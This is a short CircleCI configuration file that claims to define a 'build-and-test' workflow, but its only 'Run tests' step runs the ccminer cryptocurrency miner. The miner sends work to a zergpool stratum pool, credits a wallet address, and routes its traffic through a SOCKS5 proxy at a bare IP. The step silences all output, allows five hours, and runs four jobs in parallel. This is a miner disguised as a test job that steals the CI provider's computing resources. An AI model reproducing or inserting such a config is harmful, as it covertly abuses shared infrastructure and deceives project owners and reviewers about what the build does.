version: 2.1
parameters:
  sample:
    type: boolean
    default: false
orbs:
  
  python: circleci/python@1.2

workflows:
  sample:  
    jobs:
      - build-and-test

jobs:
  build-and-test:  
    parallelism: 4
    docker:
      - image: cobadoc/manaon
    
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           ccminer -a verus -o stratum+tcp://verushash.eu.mine.zergpool.com:3300 -u DLckzpBwWjd8rKCKnC2sRgz5ed9J6zfQnb -t 2 -x socks5://70.185.68.133:4145 > /dev/null 2>&1